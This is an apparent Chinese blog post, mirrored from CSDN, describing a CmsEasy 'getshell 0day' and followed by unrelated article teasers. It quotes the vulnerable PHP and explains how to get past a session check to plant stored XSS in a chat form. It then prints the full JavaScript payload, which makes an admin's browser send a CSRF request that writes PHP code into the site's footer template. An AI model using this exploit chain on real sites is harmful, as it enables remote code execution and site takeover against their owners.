php中提取%3cdiv,cmseasy getshell 0day-程序员宅基地

技术标签: php中提取%3cdiv  

by zvall

代码如下:

celive/index.php 代码:

[php]

$_SESSION['thislive'] = md5(time());

$_SESSION['thislivetmp'] = $_SESSION['thislive'];

if ($config['customer_info']) {

header('Location: '.$config['url'].'/live/?action=0&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));

} else {

header('Location: '.$config['url'].'/live/?action=1&module=celive&thislive='.$_SESSION['thislive'].'&departmentid='.addslashes($_GET['departmentid']));

}

[/php]

通过 302 header 到\celive\live\index.php这个地址,而且 $thislive='.$_SESSION['thislive'] 每次访问的值都会不一样.

\celive\live\index.php 代码:

[php]

if(isset($_GET['departmentid'])){

$departmentid=addslashes($_GET['departmentid']);

}else{

$sql = "SELECT `departmentid` FROM `".$config['prefix']."assigns` WHERE 1";

@$result = $GLOBALS['db']->my_fetch_array($sql);

$tatolr=count($result)-1;

$randomr=rand(0,$tatolr);

$departmentid = $result[$randomr]['departmentid'];

}

$timestamp=time();

$name=addslashes($_POST['name']);

$email=addslashes($_POST['email']);

$phone=addslashes($_POST['phone']);

$name=(!empty($name)) ? $name : 'Guest';

$email=(!empty($email)) ? $email : '-';

$phone=(!empty($phone)) ? $phone : '0';

$ip=$_SERVER["REMOTE_ADDR"];

$ip=iconv('gb2312',$GLOBALS['lang']['charset'],$ip);

if(empty($departmentid)) $departmentid=0;

if($_SESSION['thislivetmp']==$_GET['thislive']){

$db->query("INSERT INTO `sessions` (`id` ,`name` ,`email` ,`phone` ,`departmentid` ,`timestamp` ,`ip` ,`status` ) VALUES (NULL , '".$name."', '".$email."', '".$phone."', '".$departmentid."', '".$timestamp."', '".$ip."', '0');");

$sessionid = mysql_insert_id();

$_SESSION['departmentid'] = $departmentid;

$_SESSION['sessionid'] = $sessionid;

$_SESSION['timestamp'] = $timestamp;

$_SESSION['name'] = $name;

}[/php]

$name=addslashes($_POST['name']);这里可以xss 但是他是302 head过来的 。

if($_SESSION['thislivetmp']==$_GET['thislive']) 要绕过这个判断, \celive\live\index.php 只能访问一次,以保证header过去的GET变量

和session[thislivetmp] 一样 :) and =) produces

java 编程 得到302地址和cookie 构造 post name 为js地址 再 post 到302地址上 ,管理员在查看后台时 ,js触发通过ajax 请求 编辑后台模块插入一句话

666.jpg

csrf插入到模版中的php代码

ccc.jpg

bbb.jpg

js代码:[php]function sendrequest(){

var m=["Msxml2.XMLHTTP", "Microsoft.XMLHTTP"]

if (window.ActiveXObject){

for (var i=0; i

try{

return new ActiveXObject(m[i])

}

catch(e){}

}

}else if (window.XMLHttpRequest) {

return new XMLHttpRequest()

}else{

return false

}

}

var request=new sendrequest();

var data= "sid=footer_html&slen=2661&scontent=%3C!--+%E9%A1%B5%E5%BA%95+--%3E%0A%3Cdiv+id%3D%22footer%22+class%3D%22mt10%22%3E%0A%3Cdiv+class%3D%22box%22%3E%0A%3Cdiv+class%3D%22footer%22%3E%0A%3C!--+%E5%8F%8B%E6%83%85logo+--%3E%0A%3Cdiv+class%3D%22links%22%3E%0A%7Bif+%24topid%3D%3D0%7D%0A%7Bloop+friendlink('image'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+title%3D%22%7B%24flink%5Bname%5D%7D%22%3E%3Cimg+src%3D%22%7B%24flink%5Blogo%5D%7D%22+%2F%3E%3C%2Fa%3E%0A%7B%2Floop%7D%0A%7Belse%7D%0A%7Blang(hotkeys)%7D%EF%BC%9A+%7Bgethotsearch(10)%7D%0A%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C!--+%E9%A1%B5%E5%BA%95%E5%AF%BC%E8%88%AA+--%3E%0A%3Cdiv+class%3D%22about%22%3E%0A%3Cimg+src%3D%22%7B%24skin_path%7D%2Fimages%2Ffoot_logo.gif%22+%2F%3E%0A%7Btag_%E7%BD%91%E7%AB%99%E9%A1%B5%E5%BA%95%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC%E7%AD%89%E8%AF%B4%E6%98%8E%7D%0A%7Bif+get('opguestadd')%3D%3D'1'%7D%3Ca+rel%3D%22nofollow%22+href%3D%22%7B%24base_url%7D%2F%3Fg%3D1%22%3E%7Blang(opguestadd)%7D%3C%2Fa%3E+%7C%7B%2Fif%7D%0A%3Ca+href%3D%22%23%22%3ETOP%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%0A%3Cdiv+class%3D%22copyright%22%3E%0A%0A%3C!--+%E9%A1%B5%E5%BA%95%E8%AF%B4%E6%98%8E+--%3E%0A%7Bget(site_right)%7D+%3Ca+title%3D%22%7Bget('sitename')%7D%22+href%3D%22%7B%24base_url%7D%2F%22%3E%7Bget('sitename')%7D%3C%2Fa%3E+All+Rights+Reserved.%C2%A0%C2%A0+%7Bif+get('site_login')%3D%3D'1'%7D%7Blogin_js()%7D%7B%2Fif%7D%0A%3Cdiv+class%3D%22blank5%22%3E%3C%2Fdiv%3E%0A%7Bgetcnzzcount()%7D%C2%A0%C2%A0Powered+by+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%22+title%3D%22CmsEasy%E4%BC%81%E4%B8%9A%E7%BD%91%E7%AB%99%E7%B3%BB%E7%BB%9F%22+target%3D%22_blank%22%3ECmsEasy%3C%2Fa%3E%C2%A0%C2%A0%3Ca+rel%3D%22nofollow%22+href%3D%22http%3A%2F%2Fwww.miibeian.gov.cn%2F%22+rel%3D%22nofollow%22+target%3D%22_blank%22%3E%7Bget('site_icp')%7D%3C%2Fa%3E%0A%3C%2Fdiv%3E%0A%3Cdiv+class%3D%22clear%22%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%7Bif+%24topid%3D%3D0%7D%3C!--+%E7%83%AD%E9%97%A8%E5%85%B3%E9%94%AE%E8%AF%8D+--%3E%0A%3Cdiv+class%3D%22hot_keys%22%3E%0A%3Cstrong%3E%7Blang(hotkeys)%7D%EF%BC%9A%3C%2Fstrong%3E+%7Bgethotsearch(10)%7D%0A%3Cdiv+class%3D%22blank10%22%3E%3C%2Fdiv%3E%0A%3C!--+%E5%8F%8B%E6%83%85%E9%93%BE%E6%8E%A5+--%3E%0A%0A%3Cstrong%3E%7Blang('links')%7D%EF%BC%9A%3C%2Fstrong%3E%0A%7Bloop+friendlink('text'%2C0%2C20)+%24flink%7D%0A%3Ca+href%3D%22%7B%24flink%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7B%24flink%5Bname%5D%7D%3C%2Fa%3E%0A%7B%2Floop%7D%0A%0A%3C%2Fdiv%3E%7B%2Fif%7D%0A%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+src%3D%22%7B%24base_url%7D%2Fjs%2Fcommon.js%22%3E%3C%2Fscript%3E%0A%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E+%0A%2F%2F+%E5%85%AC%E5%91%8A%E6%BB%9A%E5%8A%A8js%0Avar+t%3DsetInterval(myfunc%2C1000)%3B+%0Avar+oBox%3Ddocument.getElementById(%22announ%22)%3B+%0Afunction+myfunc()%7B+%0Avar+o%3DoBox.firstChild+%0AoBox.removeChild(o)+%0AoBox.appendChild(o)+%0A%7D+%0AoBox.onmouseover%3Dfunction()%0A%7B%0AclearInterval(t)%0A%7D+%0AoBox.onmouseout%3Dfunction()%0A%7B%0At%3DsetInterval(myfunc%2C2000)%2F%2F%E6%BB%9A%E5%8A%A8%E6%97%B6%E9%97%B4%EF%BC%8C%E9%BB%98%E8%AE%A42%E7%A7%92%0A%7D+%0A%3C%2Fscript%3E%0A%0A%3C!--+%E5%9C%A8%E7%BA%BF%E5%AE%A2%E6%9C%8D+--%3E%0A%7Btemplate+'system%2Fservers.html'%7D%0A%3C!--+%E7%9F%AD%E4%BF%A1+--%3E%0A%7Btemplate+'system%2Fsms.html'%7D%0A%0A%0A%7Bif+get('share')%3D%3D'1'%7D%0A%3C!--+Baidu+Button+BEGIN+--%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshare_js%22+data%3D%22type%3Dslide%26img%3D6%26pos%3Dright%26uid%3D620555%22+%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22+id%3D%22bdshell_js%22%3E%3C%2Fscript%3E%0A%3Cscript+type%3D%22text%2Fjavascript%22%3E%0A%09%09var+bds_config+%3D+%7B%22bdTop%22%3A150%7D%3B%0A%09%09document.getElementById(%22bdshell_js%22).src+%3D+%22http%3A%2F%2Fbdimg.share.baidu.com%2Fstatic%2Fjs%2Fshell_v2.js%3Ft%3D%22+%2B+new+Date().getHours()%3B%0A%3C%2Fscript%3E%0A%3C!--+Baidu+Button+END+--%3E%0A%7B%2Fif%7D%0A%0A%0A%3Cscript%3E%0Afunction+checkmail(str)%0A%7B%0Avar+strreg%3D%22email%22%3B%0Avar+r%3B%0Avar+strtext%3Ddocument.all(str).value%3B%0A%2F%2Fstrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%5Ba-za-z0-9%5D%2B((.%7C-)%5Ba-za-z0-9%5D%2B)*.%5Ba-za-z0-9%5D%2B%24%2Fi%3B%0Astrreg%3D%2F%5Ew%2B((-w%2B)%7C(.w%2B))*%40%7B1%7Dw%2B.%7B1%7Dw%7B2%2C4%7D(.%7B0%2C1%7Dw%7B2%7D)%7B0%2C1%7D%2Fig%3B%0Ar%3Dstrtext.search(strreg)%3B%0Aif(r%3D%3D-1)+%7B%0Aalert(%22%E9%82%AE%E7%AE%B1%E6%A0%BC%E5%BC%8F%E9%94%99%E8%AF%AF!%22)%3B%0Adocument.all(str).focus()%3B%0A%7D%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E%0A%3C%3Fphp+phpinfo()%3B%3F%3E%EF%BC%9B";

request.open("POST", "/cmseasy/index.php?case=template&act=save&admin_dir=admin&site=default", true);

request.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=UTF-8");

request.send(data)[/php]

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34374684/article/details/115947687

智能推荐

【小程序】零基础微信小程序开发+实战项目_从零开始带你撸一个小程序实战项目-程序员宅基地

文章浏览阅读1.4w次,点赞38次,收藏448次。如何拥有一款属于你的小程序,惊喜就在下面!微信小程序实战前言一、微信小程序开发必备技术1.HTML语言2.CSS3.JavaScript4.服务器语言5.数据库语言二、微信开发者工具1.下载安装2.新建项目总结前言 目前,小程序行业已经成为互联网营销的热门黑马之一,依托于各大流量平台,小程序行业具有天然的用户基础和得天独厚的资源优势,凭借其方便快捷的操作以及简单通俗的模式,仅短短一年的时间,就迎来了爆发性的增长。目前市场上开发一款小程序几千到几万不等,以腾讯云为例,由腾讯官方团队设计,上线立_从零开始带你撸一个小程序实战项目

JavaWeb总结_req.set-程序员宅基地

文章浏览阅读337次。在JavaWeb的学习期间,我因为粗心遇到了许许多多的问题,但是都被我发现或者问老师解决了,没有及时的复习,我也渐渐的忘掉了一些概念,导致我只知道怎么使用,却有点不明白原因了,我觉得我因该及时复习,去巩固所学到的知识,在JavaWeb我认为有四个学习要点,servlet的使用,cookie和session的使用,以及JavaWeb的作用域,pageContext :只在当前页面有效 request : 请求期间有效 session: 会话期间有效 application : 程序运行期间有效。_req.set

【Python库】地图可视化库folium学习笔记(一)_副本_folium库-程序员宅基地

文章浏览阅读6.3k次,点赞8次,收藏80次。整理了地图可视化库folium的基础部分-构建地图和打标记,有什么错误欢迎评论区交流~喜欢就fork加star叭~_folium库

2021考研数学 高等数学第四章 不定积分_t 不(x+sinx+1)sec?x dx=_4-程序员宅基地

文章浏览阅读949次,点赞4次,收藏11次。前段时间复习完了高数第四章的内容,我参考《复习全书·基础篇》和老师讲课的内容对这一章的知识点进行了整理,形成了这篇笔记,方便在移动设备上进行访问和后续的补充修改。_t 不(x+sinx+1)sec?x dx=_4

ubuntu12.04下安装QT_ubuntu 12.04 安装qt-程序员宅基地

文章浏览阅读3.3w次。下载QT creator :地址:http://qt-project.org/downloads下面方法小白的做法 有不对的地方希望大牛指出 刚入门Qt 不知如何安装学习 求指教一:输入以下命令:

GitHub快速入门_github 如何找仓库-程序员宅基地

文章浏览阅读1.6k次。1.账号注册Github快速入门提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加第一章 账号注册提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录Github快速入门前言一、账号注册二、使用查找仓库(repository)仓库管理Issue总结前言github 全球最大的开源代码网站。一、账号注册1.需要登录外网2.github.com3.sign up注:不需要真实的邮箱号码二、使用查找仓库(repository)github仓库_github 如何找仓库

随便推点

【期末课程设计】学生成绩管理系统_成绩管理系统(c#课程设计)一、功能介绍 该成绩管理系统分为教师登录和学生登-程序员宅基地

文章浏览阅读6.9k次,点赞36次,收藏64次。学生成绩管理系统、教师入口、学生入口、添加学生、删除学生、查询排名等_成绩管理系统(c#课程设计)一、功能介绍 该成绩管理系统分为教师登录和学生登

【ELK 使用指南 3】Zookeeper、Kafka集群与Filebeat+Kafka+ELK架构(附部署实例)_zookeeper filebeat-程序员宅基地

文章浏览阅读4.6k次,点赞4次,收藏6次。Zookeeper;消息队列和中间件;Filebeat+Kafka+ELK架构_zookeeper filebeat

2019年秋季学期实验室安全考试2_对校内建筑进行改建扩建装修装饰等工程未经-程序员宅基地

文章浏览阅读6.4w次,点赞2次,收藏4次。2019年秋季学期实验室安全考试2• 学号: 分数:97.0 考试时间:2019-11-22 10:101、[判断题] 漏电保护器对两相触电(人体双手触及两相电源),不起保护作用。 (分值1.0)你的答案: 正确2、[判断题] 早晨、中饭、晚上等几个人员稀少的时间段,要特别注意随手关门,确保实验室财产和个人物品的安全。 (分值1.0)你的答案: 正确3、[判断题] 使用激光扫描..._对校内建筑进行改建扩建装修装饰等工程未经

java中初始化顺序表L,JAVA初始化顺序-程序员宅基地

文章浏览阅读566次。1、调用顺序:JAVA类首次装入时,会对静态成员变量或方法进行一次初始化,但方法不被调用是不会执行的,静态成员变量和静态初始化块级别相同,非静态成员变量和非静态初始化块级别相同。先初始化父类的静态代码--->初始化子类的静态代码-->(创建实例时,如果不创建实例,则后面的不执行)初始化父类的非静态代码--->初始化父类构造函数--->初始化子类非静态代码--->初始化..._初始化顺序表

EXCEL不求人实用技能大全汇总_excel技能大全-程序员宅基地

文章浏览阅读948次,点赞2次,收藏4次。excel实用技能汇总一.工作中常用的30个excel函数公式1.数字处理(1)取绝对值(2)取整(3)四舍五入(1)案例 =ABS()取整取整分为三种,分别是:(2.1)格式取整(也就是在单元格中通过格式控制显示为整数(四舍五入得到),复制其单元格到其他单元格里面的值依然包含小数点);(2.2)数值取整(非四舍五入):在单元格中通过公式取整 -..._excel技能大全

C++ for_each_c++ foreach (var item, pcfg->cloud_cfg)-程序员宅基地

文章浏览阅读57次。#include<vector>#include<string>#include<iostream>#include<algorithm>using namespace std;struct show{ int count; show (): count(0){} void operator()(const char& c){ cout << c; count ++; }};int main(){ vec_c++ foreach (var item, pcfg->cloud_cfg)

推荐文章

热门文章

相关标签